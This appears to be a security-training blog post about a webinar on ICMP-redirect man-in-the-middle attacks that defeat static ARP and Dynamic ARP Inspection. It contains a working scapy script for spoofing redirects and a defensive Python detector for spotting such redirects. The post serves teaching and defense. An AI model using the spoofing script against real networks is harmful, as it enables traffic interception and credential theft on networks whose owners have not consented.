Should I Stay or Should I Go
Hi everyone,
On October 20th, we at eLearnSecurity presented a webinar titled: Sneaky Man in the Middle Attack Exposed.
We had a lot of people attending with many enthusiastic comments and interesting questions. Thanks to everyone who made it!
In the webinar I demonstrated live how to circumvent common anti-man-in-the-middle techniques such as:
- Static ARP tables
- The Dynamic ARP Inspection feature of enterprise level switches
It is possible to bypass these countermeasures by using a really neat networking feature: ICMP redirect packets. This family of packets lets a router push a different route for a certain destination to the clients; they are normally used to improve network efficiency.
Anyway, as some of you are probably thinking, this is not something completely new. Tools like Ettercap can use this technique to mount a half-duplex man-in-the-middle attack. As usual, we penetration testers never settle, so we want more!
I then demonstrated how to use a very common networking technique to upgrade the attack to a full-duplex interception. It gets really fun when you use some everyday concepts in a new and interesting way. It surely was for me and for the people watching the live webinar.
You can access the full video and the rest of our technical webinars here – Sneaky Man in the Middle attack Exposed.
In the video you will see all the technical details about the attack and the whole approach used to create it.
But what is a webinar without some free goodies for you guys!? Please find the scapy script used to mount the attack at the end of this blog post. Moreover, we have just released for free a very similar scenario for all our PTP students! If you are one of our students, you will find a new lab scenario included in your Hera Lab subscription today.
As promised during the webinar, here is the scapy code:
# MitM against:
# - static ARP entries
# - Dynamic ARP inspection
# Prerequisites:
# echo 1 > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A POSTROUTING -s 10.100.13.0/255.255.255.0 -o tap0 -j MASQUERADE
from scapy.all import IP, ICMP, TCP, send

# Creating and sending ICMP redirect packets between these entities:
originalRouterIP=''
attackerIP=''
victimIP=''
serverIP=''
# Here we create an ICMP Redirect packet (type 5, code 1 = redirect for host),
# apparently coming from the original router
ip=IP()
ip.src=originalRouterIP
ip.dst=victimIP
icmpRedirect=ICMP()
icmpRedirect.type=5
icmpRedirect.code=1
icmpRedirect.gw=attackerIP
# The ICMP packet payload /should/ :) contain the original TCP SYN packet
# sent from the victimIP
redirPayloadIP=IP()
redirPayloadIP.src=victimIP
redirPayloadIP.dst=serverIP
fakeOriginalTCPSYN=TCP()
fakeOriginalTCPSYN.flags="S"
fakeOriginalTCPSYN.dport=80
fakeOriginalTCPSYN.seq=444444444
fakeOriginalTCPSYN.sport=55555
# Release the Kraken!
while True:
    send(ip/icmpRedirect/redirPayloadIP/fakeOriginalTCPSYN)
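On the defensive side, here is a small pure-Python detector, added here as an example and not part of the webinar code, that parses raw IPv4/ICMP bytes and flags ICMP redirects (type 5) whose advertised gateway, or whose sender, is not a known router on the segment; the trusted router addresses and the sample packet are constructed assumptions. Hosts can also refuse redirects outright with the sysctl net.ipv4.conf.all.accept_redirects=0, and switches that do Dynamic ARP Inspection do not inspect ICMP, so wire-level detection like this is what actually catches the script above.

```python
import socket
import struct

# Routers that may legitimately appear as ICMP redirect gateways (assumed values for this example).
TRUSTED_GATEWAYS = {"10.100.13.1", "10.100.13.2"}


def parse_icmp_redirect(frame: bytes):
    """Parse a raw IPv4 packet; return redirect details if it is ICMP type 5, else None."""
    if len(frame) < 20:
        return None
    ver_ihl, _, _, _, _, _, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", frame[:20])
    if ver_ihl >> 4 != 4 or proto != 1:       # not IPv4, or not ICMP
        return None
    icmp = frame[(ver_ihl & 0x0F) * 4:]
    if len(icmp) < 28:                        # 8-byte ICMP header + quoted original IP header
        return None
    icmp_type, icmp_code, _, gw = struct.unpack("!BBH4s", icmp[:8])
    if icmp_type != 5:
        return None
    inner_dst = icmp[24:28]                   # destination field of the quoted original packet
    return {
        "src": socket.inet_ntoa(src),
        "dst": socket.inet_ntoa(dst),
        "code": icmp_code,
        "gateway": socket.inet_ntoa(gw),
        "redirected_dst": socket.inet_ntoa(inner_dst),
    }


def classify_redirect(info, trusted=TRUSTED_GATEWAYS):
    """Return 'benign' or a reason; a redirect pointing at an unknown gateway is the MitM signature."""
    if info["gateway"] not in trusted:
        return f"suspicious: new gateway {info['gateway']} is not a known router"
    if info["src"] not in trusted:
        return f"suspicious: sender {info['src']} is not a known router"
    return "benign"


def sample_redirect(src, dst, gw, inner_src, inner_dst) -> bytes:
    """Constructed test fixture (checksums left zero): IPv4 + ICMP redirect (type 5, code 1)
    quoting an inner IPv4 header, the packet shape the scapy script above produces."""
    inner = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64, 6, 0,
                        socket.inet_aton(inner_src), socket.inet_aton(inner_dst))
    icmp = struct.pack("!BBH4s", 5, 1, 0, socket.inet_aton(gw)) + inner
    outer = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64, 1, 0,
                        socket.inet_aton(src), socket.inet_aton(dst))
    return outer + icmp
```

In a real sensor the frames would come from a packet capture rather than from the fixture, and the trusted set would be populated from the segment's actual router list.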
Questions? Ideas? Leave a comment!
Thanks for reading and happy hacking.